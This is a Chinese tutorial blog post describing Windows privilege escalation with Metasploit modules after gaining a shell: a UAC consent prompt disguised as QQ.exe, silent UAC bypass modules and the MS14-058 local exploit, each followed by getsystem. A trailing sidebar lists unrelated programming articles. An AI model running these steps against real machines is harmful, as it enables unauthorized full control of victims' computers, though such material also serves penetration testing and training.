KALI拿到shell后提权操作
时间:2022-07-23
本文章向大家介绍KALI拿到shell后提权操作,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
利用KALI 进行程序提权操作
UAC Exploit/windows/local/ask 模块提权
介绍:
使用: Exploit/windows/local/ask 该命令会在目标机器上弹出需要来自管理员权限的对话框,对方点击‘是’则可将程序权限提至最高级别并未绕过UAC
1.拿到session
后将session
放入后台
2.执行 use exploit windows/local/ask
使用ask模块
3.在ask
模块中首先设置你的session会话的ID
set session id
4.ask
模块中也可以设置弹出框的名字表示哪个应用需要来自管理员权限
set filename QQ.exe
5.其他的无需设置直接发起攻击exploit
目标情况:
如过对方选择“是” 那么会生成一个新的session
对话 如果 对方选择“否”那么该攻击会在一段时间显示超时
进入到新创建的会话中后我们再次执行getsystem
命令进行提权
UAC绕过来提权
上面的提权操作附有交互性,对于警惕性很高的人来说一般不会轻易的点击"是"
下面我们使用一种在对方不知不觉的情况下进行UAC绕过
来进行权限的提升。
模块:
Exploit/windows/local/bypassuac
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs
我们使用bypassuac
模块进行提权
1.同上面第一步操作
2.执行 use exploit/windows/local/bypassuac”进
使用bypassuac模块
3.设置你的session会话的ID
set session id
4.直接发起攻击exploit
5.进入新建的session
中执行getsystem
进行提权
利用提权漏洞进行提权
模块:Exploit/windows/local/ms14_058_track_popup_menu
1.执行 use exploit/windows/local/ms14_058_track_popup_menu
2.set session id
3.执行 exploit
即可提升权限本地漏洞提权
注:该漏洞适用于x86机器
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 来,我们一起打造一款代码命名工具
- HTML转PDF工具Wkhtmltopdf安装使用
- 【Vue.js】Vue.js组件库Element中的时间选择器、日期选择器、日期时间选择器和颜色选择器
- 【Vue.js】Vue.js的Chrome浏览器开发插件DevTools的安装步骤
- 训练提速60%!只需5行代码,PyTorch 1.6即将原生支持自动混合精度训练。
- TensorFlow 模型剪枝
- 机器人如何使用 RRT 进行路径规划?
- 高效 PyTorch:6个训练Tips
- 机器学习与情绪交易(附代码)
- 社区前端游戏框架LollipopCreator v1.0.X正式开源
- 社区开源框架音效管理模块:AudioManager详解
- 社区开源框架音效管理模块:AvatarManager详解
- vue-element-admin实现一个可编辑的table
- vue+element实现一个excel表格下载的功能
- vue的select下拉框多选项-multiple属性